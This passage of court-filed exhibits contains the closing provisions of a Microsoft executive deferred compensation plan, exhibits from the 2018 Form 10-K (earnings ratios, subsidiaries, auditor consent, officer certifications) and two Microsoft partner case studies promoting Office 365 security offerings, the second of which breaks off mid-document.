> (d)    Review of Denial.  Upon denial of a claim, in whole or in part, a claimant or his duly authorized representative will have the right to submit a written request to the Senior HR Officer for a full and fair review of the denied claim by filing a written notice of appeal with the Senior HR Officer within 60 days of the receipt by the claimant of written notice of the denial of the claim.  A claimant or the claimant's authorized representative will have, upon request and free of charge, reasonable access to, and copies of, all documents, records, and other information relevant to the claimant's claim for benefits and may submit issues and comments in writing.  The review will take into account all comments, documents, records, and other information submitted by the claimant relating to the claim, without regard to whether such information was submitted or considered in the initial benefit determination.

> If the claimant fails to file a request for review within 60 days of the denial notification, the claim will be deemed abandoned and the claimant precluded from reasserting it.  If the claimant does file a request for review, his request must include a description of the issues and evidence he deems relevant.  Failure to raise issues or present evidence on review will preclude those issues or evidence from being presented in any subsequent proceeding or judicial review of the claim.

> (e)    Decision Upon Review.  The Senior HR Officer will provide a prompt written decision on review.  If the claim is denied on review, the decision shall set forth:

>> (i)    the specific reason or reasons for the adverse determination;

(ii)      specific reference to pertinent Plan provisions on which the adverse determination is based;

(iii)      a statement that the claimant is entitled to receive, upon request and free of charge, reasonable access to, and copies of, all documents, records, and other information relevant to the claimant's claim for benefits; and

(iv)      a statement describing any voluntary appeal procedures offered by the Plan and the claimant's right to obtain the information about such procedures, as well as a statement of the claimant's right to bring an action under ERISA section 502(a).

A decision will be rendered no more than 60 days after the Senior HR Officer's receipt of the request for review, except that such period may be extended for an additional 60 days if the Senior HR Officer determines that special circumstances (such as for a hearing) require such extension.  If an extension of time is required, written notice of the extension will be furnished to the claimant before the end of the initial 60-day period.

(f)      Finality of Determinations; Exhaustion of Remedies.  To the extent permitted by law, decisions reached under the claims procedures set forth in this Section shall be final and binding on all parties. No legal action for benefits under the Plan shall be brought unless and until the claimant has exhausted his remedies under this Section. In any such legal action, the claimant may only present evidence and theories which the claimant presented during the claims procedure. Any claims which the claimant does not in good faith pursue through the review stage of the procedure shall be treated as having been irrevocably waived. Judicial review of a claimant's denied claim shall be limited to a determination of whether the denial was an abuse of discretion based on the evidence and theories the claimant presented during the claims procedure. Any suit or legal action initiated by a claimant under the Plan must be brought by the claimant no later than one year following a final decision on the claim for benefits by the Senior HR Officer.  The one-year limitation on suits for benefits will apply in any forum where a claimant initiates such suit or legal action.

(g)      Disability Claims.  Claims for disability benefits shall be determined under the DOL Regulation section 2560.503-1 which is hereby incorporated by reference.

8.      Amendment and Termination.

8.1      Amendment or Termination.  The Company reserves the right to amend or terminate the Plan when, in the sole discretion of the Company, such amendment or termination is advisable, pursuant to a resolution or other action taken by the Plan Administrator.

Notwithstanding the foregoing, no amendment of the Plan shall apply to amounts that were earned and vested (within the meaning of Code section 409A and regulations thereunder) under the Plan prior to 2005, unless the amendment specifically provides that it applies to such amounts.  The purpose of this restriction is to prevent a Plan amendment from resulting in an inadvertent "material modification" to amounts that are "grandfathered" and exempt from the requirements of Code section 409A.

8.2      Effect of Amendment or Termination.  No amendment or termination of the Plan shall decrease the amounts credited to a Participant's Account as of such amendment or termination.  Upon termination of the Plan, Participants' Account balances shall be distributed in accordance with the terms of Section 6, unless the Company determines in its sole discretion that all such amounts shall be distributed upon termination in accordance with the requirements under Code section 409A.

9.      General Provisions.

9.1      Rights Unsecured.  The right of a Participant or his beneficiary to receive a distribution hereunder shall be an unsecured claim against the general assets of the Company, and neither the Participant nor his beneficiary shall have any rights in or against any amount credited to any Account or any other assets of the Company.  The Plan at all times shall be considered entirely unfunded for tax purposes.  Any funds set aside by the Company for the purpose of meeting its obligations under the Plan, including any amounts held by a trustee, shall continue for all purposes to be part of the general assets of the Company and shall be available to its general creditors in the event of the Company's bankruptcy or insolvency.  The Company's obligation under this Plan shall be that of an unfunded and unsecured promise to pay money in the future.

9.2    <u>No Right to Eligible Income</u>.  Nothing in this Plan shall be construed to give any Eligible Employee any right to be granted Eligible Income or any other type of compensation.

9.3    <u>No Enlargement of Rights</u>.  No Participant or beneficiary shall have any right to receive a distribution under the Plan except in accordance with the terms of the Plan.  Establishment of the Plan shall not be construed to give any Participant the right to continue to be employed by or provide services to the Company or its affiliates or to employment that is not terminable at will.

9.4    <u>No Guarantee of Benefits</u>.  Nothing contained in the Plan shall constitute a guarantee by the Company or any other person or entity that the assets of the Company will be sufficient to pay any benefits hereunder.

9.5    <u>Nonalienation of Benefits</u>.  This Plan inures to the benefit of and is binding upon the parties hereto and their successors, heirs and assigns; provided, however, that the amounts credited to a Participant's Account are not, except as provided in Sections 9.6 and 6.11, subject in any manner to anticipation, alienation, sale, transfer, assignment, pledge, encumbrance, charge, garnishment, execution or levy of any kind, either voluntary or involuntary, and any attempt to anticipate, alienate, sell, transfer, assign, pledge, encumber, charge or otherwise dispose of any right to any benefits payable hereunder, will be null and void and not binding on the Plan or the Company.

9.6    <u>Taxes</u>.  In addition to its rights under section 5.5, the Company or other payor may withhold from a benefit payment under the Plan or a Participant's wages any federal, state, or local taxes required by law to be withheld with respect to a payment or accrual under the Plan, and shall report such payments and other Plan-related information to the appropriate governmental agencies as required under applicable law.

9.7    <u>Participant's Cooperation</u>.  The Participant shall cooperate with the Company by furnishing any and all information requested by the Plan Administrator in order to facilitate the payment of benefits hereunder, taking such physical examinations as the Plan Administrator may deem necessary and taking such other actions as may be requested by the Plan Administrator. If the Participant refuses to cooperate, the Company shall have no further obligation to the Participant under the Plan.

9.8    <u>Incapacity of Recipient</u>.  If any person entitled to a distribution under the Plan is deemed by the Plan Administrator to be incapable of personally receiving and giving a valid receipt for such payment, then, unless and until a claim for such payment shall have been made by a duly appointed guardian or other legal representative of such person, the Plan Administrator may provide for such payment or any part thereof to be made to any other person or institution then contributing toward or providing for the care and maintenance of such person.  Any such payment shall be a payment for the account of such person and a complete discharge of any liability of the Company and the Plan with respect to the payment.

9.9    <u>Legally Binding</u>.  In the event of any consolidation, merger, acquisition or reorganization, the obligations of the Company under this Plan shall continue and be binding on the Company and its successors or assigns.  The rights, privileges, benefits and obligations under the Plan are intended to be legal obligations of the Company and binding upon the Company, its successors and assigns.

9.10    <u>Unclaimed Benefits</u>.  Each Participant shall keep the Plan Administrator informed of his current address and the current address of his designated beneficiary.  The Plan Administrator shall not be obligated to search for the whereabouts of any person if the location of a person is not made known to the Plan Administrator.

9.11    <u>Severability</u>.  In the event any provision of the Plan shall be held invalid or illegal for any reason, any illegality or invalidity shall not affect the remaining parts of the Plan, but the Plan shall be construed and enforced as if the illegal or invalid provision had never been inserted.

9.12    <u>Words and Headings</u>.  Words in the masculine gender shall include the feminine and the singular shall include the plural, and vice versa, unless qualified by the context.  Any headings used herein are included for ease of reference only, and are not to be construed so as to alter the terms hereof.

9.13    <u>Applicable Law and Venue</u>.  To the extent not preempted by federal law, the Plan shall be governed by the laws of the State of Washington.  In the event the Company or any Participant (or beneficiary) initiates litigation related to this Plan, the venue for such action will be in King County, Washington.

9.14    <u>Waiver of Breach</u>.  The waiver by the Company of any breach of any provision of the Plan by the Participant shall not operate or be construed as a waiver of any subsequent breach by the Participant.

9.15    <u>Notice</u>.  Any notice or filing required or permitted to be given to the Plan Administrator under the Plan shall be sufficient if in writing and hand-delivered, or sent by first class mail to the principal office of the Company, directed to the attention of the Plan Administrator.  Such notice shall be deemed given as of the date of delivery, or, if delivery is made by mail, as of the date shown on the postmark.

9.16    <u>Attorneys' Fees and Costs</u>.  In the event that a dispute regarding benefits arises between the Company or Plan Administrator and a Participant (or beneficiary) and such dispute is resolved through arbitration or litigation in court, the prevailing party(ies) shall be entitled to their reasonable attorneys' fees and costs incurred in such action.

Case 0:20-cv-60416-XXXX   Document 1-35   Entered on FLSD Docket 02/26/2020   Page 576 of 726

The Company has caused this restated Plan to be duly adopted and executed on this _____ day of _____, 2015.

_____
Kathleen Hogan
Executive Vice President, Human Resources

**APPENDIX A**

**DESIGNATED SUBSIDIARIES**

**(As of May 15, 2015)**

1654:  MOL Corporation

1693:  Vexcel Corporation

1548:  Microsoft Online, Inc.

1888:  Microsoft Payments, Inc.

1899:  Microsoft Open Technologies, Inc.

1988:  Microsoft Technology Licensing

## APPENDIX B

## <u>GRANDFATHERED AMOUNTS</u>

Distribution of amounts that were earned and vested (within the meaning of Code section 409A and regulations thereunder) under the Plan prior to 2005 (and earnings thereon) and are exempt from the requirements of Code section 409A shall be made in accordance with the Plan terms as in effect on December 31, 2004 and as summarized in this Appendix B.

B.1     <u>Timing</u>.  As soon as practicable following the final day of the Deferral Period for a specific deferral, the Company will distribute to the Participant (or in the case of the Participant's death, his estate), all proceeds in the Participant's Deferred Bonus Account and will issue to the Participant (or in the event of the Participant's death, the personal representative or beneficiaries of his estate) shares of Stock credited to the Participant's Deferred Stock Option Gain Account, that are attributed to that deferral.  With respect to a specific deferral, the final day of the Deferral Period shall be the earliest of the last day of the Deferral Period selected by the Participant or the date he has a Termination of Employment.  Upon Termination of Employment, a Participant will have the same rights with respect to an unexercised Option that he would have if he had not elected to defer the Stock Option Gain relating to that Option.  The portion of a Participant's Accounts that can be attributed to a specific deferral shall be determined in the sole discretion of the Plan Administrator.

B.2     <u>Extension of Deferral Period</u>.  On a one-time basis with respect to each deferral, a Participant may elect in accordance with procedures established by the Plan Administrator to extend the Deferral Period for a Bonus or Stock Option Gain for an additional five (5), seven (7), or ten (10) years, provided that such extension is elected in the calendar year prior, and at least six (6) months prior, to the expiration of the initial Deferral Period and the Participant is an Eligible Executive at the time he makes the election to extend the Deferral Period.

B.3     <u>Disability</u>.  In the event of a Participant's Disability and upon application by such Participant, the Plan Administrator may determine that payment of all, or part, of such Participant's Accounts shall be made in a different manner, or on an earlier date than the time or times specified in Section B.1 above, but only to the extent determined by the Plan Administrator to be reasonably required to satisfy the Participant's need.

B.4     <u>Investment of Accounts</u>.  Notwithstanding Section 5.4, a Participant shall not have the right to select among Investment Options for amounts credited to the Participant's Deferred Stock Option Gain Account.  Such amounts shall be treated as if invested in Stock at all times.

B.5     <u>Definitions</u>.  For purposes of this Appendix B, the following terms shall have the meanings indicated below:

<u>Bonus</u> means the amount payable by the Company to an Eligible Employee as an individual performance bonus, executive bonus or any other bonus/incentive award that is approved by the Plan Administrator for deferral under the Plan.

<u>Deferral Period</u> means with respect to a specific deferral of a Bonus or Stock Option Gain, the period of five (5), seven (7), or ten (10) years from the date on which the corresponding Bonus would otherwise have been paid or the date the Option was scheduled to expire had it not been exercised; provided that, in the event of the Participant's Termination of Employment, the Deferral Period shall end on the date of Termination of Employment.

<u>Deferred Bonus Account</u> means a bookkeeping account established for Bonuses deferred under the Plan.

<u>Deferred Stock Option Gain Account</u> means a bookkeeping account established for Stock Option Gains deferred under the Plan.

<u>Disability</u> means any long-term disability as defined under the Company's long-term disability plan. The Plan Administrator, in its complete and sole discretion, shall determine a Participant's Disability.  The Plan Administrator may require that the Participant submit to an examination on an annual basis, at the expense of the Company, by a competent physician or medical clinic selected by the Plan Administrator to assist in the determination of Disability.  On the basis of such medical evidence, the determination of the Plan Administrator as to whether or not a condition of Disability exists or continues shall be conclusive.

Eligible Executive means a full-time employee of the Company who is (i) an elected officer of the Company, (ii) at the level of Vice President or above, (iii) at Level 16 or above on the Company's salary range, and (iv) working within the United States of America.  In addition, the Plan Administrator may, in his or her discretion, extend coverage to persons who are selected by the Plan Administrator and who either (y) meet all of the foregoing requirements except that they are working outside of the United States of America, or (z) are officers of a subsidiary of the Company.

Mature Shares means shares of the Company's Stock delivered by a Participant in payment of the exercise price of an Option; provided that Mature Shares shall not include any shares of the Company's Stock that may be received upon exercise of such Option, nor Stock that the Participant purchased pursuant to a prior stock option exercise which occurred less than six months prior to the exercise of such Option.

Option shall mean one or more non-qualified stock options, issued to a Participant under any stock option plan of the Company, with respect to which the Participant has elected to defer the Stock Option Gain.  Option shall not include any rights under the Company's Employee Stock Purchase Plan.

Stock - means Microsoft Corporation common stock.

Stock Option Gain means the number of shares underlying an Option minus the number of Mature Shares required to pay the exercise price for those shares.  For example, if a Participant elects to defer the gain on 100 shares and is required to deliver 10 shares of Stock as payment for the exercise price on the 100 shares, the Stock Option Gain will be 90 shares.

Termination of Employment means the termination of the Participant's employment relationship with the Company for any reason including, without limitation, involuntary termination with or without cause, voluntary termination, disability, death, or retirement.

## APPENDIX C

### 2005 DEFERRED COMPENSATION

This Appendix C sets forth the special rules applicable to compensation eligible for deferral under the Plan from January 1, 2005 through December 31, 2005.  Unless otherwise defined herein, capitalized terms used but not otherwise defined herein shall have the meanings given to them in the Plan and Appendix B.

C-1.    <u>2005 Initial Deferral Elections</u>.  Notwithstanding anything in Section 5.1 of the Plan to the contrary and only with respect to compensation earned during the 2005 Plan Year ("2005 Income"), an Eligible Employee may make an irrevocable election to defer up to 100% of a Bonus in ten (10) percent increments.  Eligible Employees are not permitted to defer gains on the exercise of a stock option under the Plan after December 31, 2004.

C-2.    <u>Time of Distribution</u>.  The Company will distribute to the Participant (or in the case of the Participant's death, his estate) all proceeds in the Participant's Deferred Bonus Account that are attributed to a specific deferral upon the earlier of:  (1) the last day of the Deferral Period elected by the Participant; or (2) the date of the Participant's Separation from Service; provided that, if a distribution is to be made upon the Separation from Service of a Key Employee, such distribution is subject to the six month delay set forth in Section 6.4 of the Plan.

For purposes of this Appendix C, "Deferral Period" means with respect to a specific deferral of a Bonus, the period, as elected by the Participant at the time of the deferral election, of five (5), seven (7), or ten (10) years from the date on which the corresponding Bonus would otherwise have been paid.

C-3.    <u>Changes in Time or Form of Distribution</u>.  To the extent the Company allows a Participant to make a subsequent election to change the time or form of distribution of 2005 Income deferred under the Plan, such election will be effective only if the conditions set forth in Section 6.7 of the Plan are satisfied.

C-4.    <u>General Application of the Plan</u>.  Other than as set forth above, the terms of the Plan in all other respects and in compliance with Code section 409A shall govern the distribution of 2005 Income deferred under the Plan from January 1, 2005 through December 31, 2005.

Exhibit 12

**COMPUTATION OF RATIOS OF EARNINGS TO FIXED CHARGES**

(In millions, except ratios)

| Year Ended June 30, | | 2018 | | 2017[c] | | 2016[c] | | 2015 | | 2014 |
|---|---|---|---|---|---|---|---|---|---|---|
| **Earnings** [a] | | | | | | | | | | |
| Earnings from continuing operations before income taxes | $ | **36,474** | $ | 29,901 | $ | 25,639 | $ | 18,507 | $ | 27,820 |
| Add: Fixed charges | | **2,807** | | 2,324 | | 1,325 | | 867 | | 674 |
| Add: Cash distributions from equity method investments | | **8** | | 12 | | 12 | | 1 | | 54 |
| Subtract: Gain (Loss) from equity method investments | | **31** | | (14) | | (25) | | (78) | | (152) |
| Total Earnings | $ | **39,258** | $ | 32,251 | $ | 27,001 | $ | 19,453 | $ | 28,700 |
| **Fixed Charges** [b] | | | | | | | | | | |
| Interest expense | $ | **2,674** | $ | 2,141 | $ | 1,185 | $ | 756 | $ | 577 |
| Capitalized debt related expenses | | **59** | | 81 | | 58 | | 25 | | 20 |
| Interest component of rental expense | | **74** | | 102 | | 82 | | 86 | | 77 |
| Total Fixed Charges | $ | **2,807** | $ | 2,324 | $ | 1,325 | $ | 867 | $ | 674 |
| **Ratio of Earnings to Fixed Charges** | | **14** | | 14 | | 20 | | 22 | | 43 |

(a)   *Earnings represent earnings from continuing operations before income taxes and before income (losses) from equity method investments plus: (1) fixed charges; and (2) cash distributions from equity method investments.*

(b)   *Fixed charges include: (1) interest expense; (2) capitalized debt issuance costs; and (3) the portion of operating rental expense which management believes is representative of the interest component of rental expense.*

(c)   *Reflects the impact of the adoption of the new accounting standard in fiscal year 2018 related to revenue recognition. Refer to Note 1 – Accounting Policies of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.*

Exhibit 21

### SUBSIDIARIES OF REGISTRANT

The following is a list of subsidiaries of the company as of June 30, 2018, omitting subsidiaries which, considered in the aggregate, would not constitute a significant subsidiary.

| Name | Where Incorporated |
| --- | --- |
| Microsoft Ireland Research | Ireland |
| Microsoft Global Finance | Ireland |
| Microsoft Ireland Operations Limited | Ireland |
| Microsoft Online, Inc. | United States |
| Microsoft Operations Pte Ltd | Singapore |
| Microsoft Regional Sales Corporation | United States |
| LinkedIn Corporation | United States |
| LinkedIn Ireland Unlimited Company | Ireland |

Exhibit 23.1

**CONSENT OF INDEPENDENT REGISTERED PUBLIC ACCOUNTING FIRM**

We consent to the incorporation by reference in Registration Statement Nos. 333-109185, 333-118764, 333-52852, 333-132100, 333-161516, 333-75243, 333-185757, and 333-221833 on Form S-8 and Registration Statement No. 333-207652 on Form S-3 of our reports dated August 3, 2018, relating to the consolidated financial statements and the related notes of Microsoft Corporation and subsidiaries (the "Company") (which report expresses an unqualified opinion and includes an explanatory paragraph related to the Company's change in method of accounting for revenue from contracts with customers and for accounting for leases in fiscal year 2018 due to the adoption of the new revenue standard and new lease standard, respectively), and the effectiveness of the Company's internal control over financial reporting, appearing in this Annual Report on Form 10-K of Microsoft Corporation for the year ended June 30, 2018.

/s/ DELOITTE & TOUCHE LLP

Seattle, Washington
August 3, 2018

Exhibit 31.1

## CERTIFICATIONS

I, Satya Nadella, certify that:

1. I have reviewed this annual report on Form 10-K of Microsoft Corporation;

2. Based on my knowledge, this report does not contain any untrue statement of a material fact or omit to state a material fact necessary to make the statements made, in light of the circumstances under which such statements were made, not misleading with respect to the period covered by this report;

3. Based on my knowledge, the financial statements, and other financial information included in this report, fairly present in all material respects the financial condition, results of operations and cash flows of the registrant as of, and for, the periods presented in this report;

4. The registrant's other certifying officer and I are responsible for establishing and maintaining disclosure controls and procedures (as defined in Exchange Act Rules 13a-15(e) and 15d-15(e)) and internal control over financial reporting (as defined in Exchange Act Rules 13a-15(f) and 15d-15(f)) for the registrant and have:

a) Designed such disclosure controls and procedures, or caused such disclosure controls and procedures to be designed under our supervision, to ensure that material information relating to the registrant, including its consolidated subsidiaries, is made known to us by others within those entities, particularly during the period in which this report is being prepared;

b) Designed such internal control over financial reporting, or caused such internal control over financial reporting to be designed under our supervision, to provide reasonable assurance regarding the reliability of financial reporting and the preparation of financial statements for external purposes in accordance with generally accepted accounting principles;

c) Evaluated the effectiveness of the registrant's disclosure controls and procedures and presented in this report our conclusions about the effectiveness of the disclosure controls and procedures, as of the end of the period covered by this report based on such evaluation; and

d) Disclosed in this report any change in the registrant's internal control over financial reporting that occurred during the registrant's most recent fiscal quarter (the registrant's fourth fiscal quarter in the case of an annual report) that has materially affected, or is reasonably likely to materially affect, the registrant's internal control over financial reporting; and

5. The registrant's other certifying officer and I have disclosed, based on our most recent evaluation of internal control over financial reporting, to the registrant's auditors and the audit committee of registrant's Board of Directors (or persons performing the equivalent functions):

a) All significant deficiencies and material weaknesses in the design or operation of internal control over financial reporting which are reasonably likely to adversely affect the registrant's ability to record, process, summarize and report financial information; and

b) Any fraud, whether or not material, that involves management or other employees who have a significant role in the registrant's internal control over financial reporting.


/s/ SATYA NADELLA
Satya Nadella
Chief Executive Officer

August 3, 2018

Exhibit 31.2

**CERTIFICATIONS**

I, Amy E. Hood, certify that:

1. I have reviewed this annual report on Form 10-K of Microsoft Corporation;

2. Based on my knowledge, this report does not contain any untrue statement of a material fact or omit to state a material fact necessary to make the statements made, in light of the circumstances under which such statements were made, not misleading with respect to the period covered by this report;

3. Based on my knowledge, the financial statements, and other financial information included in this report, fairly present in all material respects the financial condition, results of operations and cash flows of the registrant as of, and for, the periods presented in this report;

4. The registrant's other certifying officer and I are responsible for establishing and maintaining disclosure controls and procedures (as defined in Exchange Act Rules 13a-15(e) and 15d-15(e)) and internal control over financial reporting (as defined in Exchange Act Rules 13a-15(f) and 15d-15(f)) for the registrant and have:

a) Designed such disclosure controls and procedures, or caused such disclosure controls and procedures to be designed under our supervision, to ensure that material information relating to the registrant, including its consolidated subsidiaries, is made known to us by others within those entities, particularly during the period in which this report is being prepared;

b) Designed such internal control over financial reporting, or caused such internal control over financial reporting to be designed under our supervision, to provide reasonable assurance regarding the reliability of financial reporting and the preparation of financial statements for external purposes in accordance with generally accepted accounting principles;

c) Evaluated the effectiveness of the registrant's disclosure controls and procedures and presented in this report our conclusions about the effectiveness of the disclosure controls and procedures, as of the end of the period covered by this report based on such evaluation; and

d) Disclosed in this report any change in the registrant's internal control over financial reporting that occurred during the registrant's most recent fiscal quarter (the registrant's fourth fiscal quarter in the case of an annual report) that has materially affected, or is reasonably likely to materially affect, the registrant's internal control over financial reporting; and

5. The registrant's other certifying officer and I have disclosed, based on our most recent evaluation of internal control over financial reporting, to the registrant's auditors and the audit committee of registrant's Board of Directors (or persons performing the equivalent functions):

a) All significant deficiencies and material weaknesses in the design or operation of internal control over financial reporting which are reasonably likely to adversely affect the registrant's ability to record, process, summarize and report financial information; and

b) Any fraud, whether or not material, that involves management or other employees who have a significant role in the registrant's internal control over financial reporting.

/s/ AMY E. HOOD
_____
Amy E. Hood
Executive Vice President and
Chief Financial Officer

August 3, 2018

Exhibit 32.1

**CERTIFICATIONS PURSUANT TO**
**SECTION 906 OF THE SARBANES-OXLEY ACT OF 2002**
**(18 U.S.C. SECTION 1350)**

In connection with the Annual Report of Microsoft Corporation, a Washington corporation (the "Company"), on Form 10-K for the year ended June 30, 2018, as filed with the Securities and Exchange Commission (the "Report"), Satya Nadella, Chief Executive Officer of the Company, does hereby certify, pursuant to § 906 of the Sarbanes-Oxley Act of 2002 (18 U.S.C. § 1350), that to his knowledge:

(1) The Report fully complies with the requirements of section 13(a) or 15(d) of the Securities Exchange Act of 1934; and

(2) The information contained in the Report fairly presents, in all material respects, the financial condition and results of operations of the Company.

/s/ SATYA NADELLA
Satya Nadella
Chief Executive Officer

August 3, 2018

[A signed original of this written statement required by Section 906 has been provided to Microsoft Corporation and will be retained by Microsoft Corporation and furnished to the Securities and Exchange Commission or its staff upon request.]

Exhibit 32.2

**CERTIFICATIONS PURSUANT TO**
**SECTION 906 OF THE SARBANES-OXLEY ACT OF 2002**
**(18 U.S.C. SECTION 1350)**

In connection with the Annual Report of Microsoft Corporation, a Washington corporation (the "Company"), on Form 10-K for the year ended June 30, 2018, as filed with the Securities and Exchange Commission (the "Report"), Amy E. Hood, Chief Financial Officer of the Company, does hereby certify, pursuant to § 906 of the Sarbanes-Oxley Act of 2002 (18 U.S.C. § 1350), that to her knowledge:

(1) The Report fully complies with the requirements of section 13(a) or 15(d) of the Securities Exchange Act of 1934; and

(2) The information contained in the Report fairly presents, in all material respects, the financial condition and results of operations of the Company.


/s/ AMY E. HOOD
Amy E. Hood
Executive Vice President and
Chief Financial Officer

August 3, 2018

[A signed original of this written statement required by Section 906 has been provided to Microsoft Corporation and will be retained by Microsoft Corporation and furnished to the Securities and Exchange Commission or its staff upon request.]

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSD Docket 02/26/2020 Page 588 of 726

# EXHIBIT 34



# Office 365 Advanced Security and Compliance Solutions
# Case Study: Olive + Goose

## OLIVE + GOOSE

### Company Profile:

Olive + Goose is a leading IT solutions company, with a wide base of customers in the US and worldwide. The company's vision is to help organizations succeed in the transformation of their IT environment by delivering world class SaaS solutions.

### Location:

Seattle, WA, USA; Charlotte, NC, USA

"**Every Office 365 engagement that we're a part of has a component of security discussion or deployment and implementation with a customer...**

**Our primary focus is making sure the customer is doing well, and that approach has worked well for us. We make sure their security and compliance needs are met, while also helping them save money.**"

- Ethan McConnell, Vice President

## Microsoft security paves the way for partners.

Office 365 provides flexible and familiar tools for collaboration across teams, devices, and platforms. However, lack of cloud security knowledge, and IT expertise to get ahead of security and compliance risks is a top challenge holding back further SaaS adoption.

Seattle firm Olive + Goose has built a successful business targeting the Office 365 security and compliance space. Their team has extensive experience with Microsoft technologies, giving them the ability to create deep customer engagements based on their experience of what's most relevant and valuable to today's organizations.

One factor Ethan McConnell, Vice President at Olive + Goose, highlights in their success is Microsoft's cohesive security story. The integration of security and compliance features within Office 365, and extending out across the broader Microsoft technologies, cost-effectively provides customers with the capabilities they need – all from a single vendor.

Olive + Goose is happy with their decision to focus on Microsoft technologies for their customers' security and compliance needs because they're able to offer an integrated solution in which the pieces are designed to work well together. With new capabilities being added on a regular basis, their customers benefit from being able to add functionality as it becomes available. Customers approach them with their concerns or needs, knowing Olive + Goose has the capability to offer strong recommendations based on their experience and knowledge.

Because they deal with features like eDiscovery, Data Loss Prevention (DLP), and Advanced Threat Protection on a regular basis, Olive + Goose has the knowledge base to immediately help customers with real world issues. According to McConnell, providing security and compliance services has been a huge win. Customers look to them to help manage the full range of Office 365 capabilities. It's not uncommon for individual projects to lead to on-going managed service engagements.

## Value propositions that pay off for customers, and partners.

Designed to help customers uncover and protect against advanced threats, Advanced Threat Protection (ATP) in Office 365 Enterprise E5 offers a compelling customer story. "ATP is valuable because if there's an attack, or if a customer has had ransomware or an attack on their customer base in the past, it's a must-have. The value prop is super easy to understand, and it can be turned on very quickly. The value add for us is that we're able to layer on services and extra capabilities on top of that as well," explains Olive + Goose Founder and President Ankur Kothari.

Microsoft Confidential, for internal and partner use only

See a comparison of Office 365 plans here

This document is for informational purposes only.  MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.



Advanced Security Management in Office 365 E5 is another technology that makes it easy to get a customer's interest. As Kothari puts it, "Customers want to know what's going on in their organization and make sure they're protected. It's an easy one to quickly put in, understand, and get up and running. The value prop is quite clear to most customers."

For example, one Olive + Goose customer was very concerned about keeping their IP confidential from hackers or industrial espionage. They were using an expensive solution that did a review of certain communications between sales people and end users. Because of Office 365's native capabilities, they could offer similar functionality, all included with Office 365 E5.

"The customer told us that they wanted to facilitate collaboration and external sharing, but still wanted to control and monitor the capabilities from a compliance perspective." explains McConnell. "Since Microsoft offered that tool natively, as part of the solution, it made the value proposition that much greater for the Director of IT to go to the board and say "I want to buy this." It also made it that much more comforting for the Director of Information Security to be ok with this. It was a win:win on both sides."

McConnell explains how Advanced Security Management (ASM) also opens the door to add even more cloud services: "With ASM, every customer we talk to is concerned about what their users are storing. They want to have insight into that data."

## New services mean more business on the horizon.

According to McConnell, new security and compliance capabilities mean even more opportunity ahead. "Customers are asking for more intelligence and insights into threats – it's something they need and have been asking for constantly. Threat Intelligence Dashboard is going to be very valuable and will really enhance the solutions we offer."

They also see strong potential with Advanced Data Governance (ADG) in Office 365 E5.

"Advanced Data Governance is a game changer. said Kothari. Seeing Advanced Data Governance in action paves the way for a faster sale. McConnell added: "If there's anything to demo to a customer, it should be the data governance piece..your average IT department or information governance person, they'll look at that ADG demo be very impressed."

**"We had a week-long engagement with one customer recently and we showed them Advanced Data Governance. Their response was: "From a compliance perspective, I'm seeing the future. I didn't expect this to be this good at this point. "It's a game-changer."**

- Ethan McConnell, Vice President

## Turn cloud averse customers into cloud advocates.

Olive + Goose enjoys working with customers who have reservations about moving ot the cloud. While they are more challenging, according to McConnell, "I like those customers because, when you do get in there and get that time with the CISO or Director of IT who's worried about security, and get the opportunity to explain how Microsoft approaches security, it's almost as if you take your adversary and you've turned them into your biggest advocate...That's a big play for us."

## Staying informed sets partners up for long-term success.

The Olive + Goose team stresses that it's important for partners to stay tuned into Microsoft's direction and roadmap. Their suggestion to partners: "Be proactive in knowing what Microsoft is doing in security and compliance, because if they're not doing it today, they're going to be doing it tomorrow. Eventually, customers will look at that other solution as a drain on their cost center vs. something they already own in Office 365."

Microsoft Confidential, for internal and partner use only
This document is for informational purposes only.  MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSD Docket 02/26/2020 Page 591 of 726

# EXHIBIT 35



**Microsoft**

# Office 365 Advanced Security Workloads Best Practices Case Study: Peters & Associates



## Overview

## Company Profile:

Chicago-based Peters & Associates provides full-service IT consulting, managed IT services, and integrated IT solutions. Over the past three decades, they have developed award-winning solutions for business, education, finance, manufacturing, and health care. They have a long record of success as a Microsoft Partner, providing design, integration, and support for Microsoft infrastructure, collaboration, data analytics, and security products and services.

## Location:

Oakbrook Terrace, Illinois

**"Security has become so mainstream that a lot of customers are skipping over the objections we used to see. New capabilities are the main focus now."**

— Bruce Ward, Vice President of Business Strategy, Peters & Associates

## Microsoft security solutions provide a competitive advantage.

Security is a top concern for nearly every business, but many lack the in-house expertise and resources to handle today's threats. These customers are receptive to partners who can assess vulnerabilities and deploy a broad range of security solutions, especially solutions that provide a demonstrable and immediate return on investment.

In the Chicago area, Peters & Associates is using Microsoft security and compliance solutions as a key component in the transformation of its IT consulting practice. As a long-time Microsoft partner with multiple Gold and Silver competencies, they're positioning themselves as leaders in the security space, and showing both existing and prospective customers how Office 365 E5 can help them better identify and address security vulnerabilities.

## Thought leadership drives growth.

Recently, Peters & Associates has focused on developing content, hosting events, and creating a social media presence to reinforce its leadership position. These efforts are all tied to specific topics that leverage their expertise.

For example, as more companies become victims of ransomware, Peters & Associates has published a series of blog posts that provide advice on everything from whether to pay ransom demands to proactively opening a Bitcoin account to get a three-day lead in case customers decide to pay the ransom. Of course, the key message is to take the necessary steps to ramp up security and prevent attacks.

The goal of Peters & Associates content strategy is to open conversations that ultimately lead to a security assessment.

## Security assessments are the launching point.

"Everything always starts with an assessment," explains Bruce Ward, Vice President of Business Strategy. "It's a truism around our organization that you pretty much can't do anything until you know something about the client, and you have assessed their vulnerabilities."

Office 365 Secure Score is an important part of this process. "When Microsoft first released Secure Score, we were right in the middle of a manual assessment for a large banking client. Secure Score made the process easier and more graphical," said Ward. "Now it's part of our security assessment and it's an element we use to judge things that have moved from ground to cloud."

Security assessments have helped them land several new customer accounts, and opened other opportunities that are currently on the table.

Microsoft Confidential, for internal and partner use only
This document is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.

> **"Nothing produces more 'Aha!' moments than when a customer first sees Advanced Threat Protection block malicious emails that normally would have gone into their inbox."**
>
> — Bruce Ward, Vice President of Business Strategy, Peters & Associates

## Extending customer engagements.

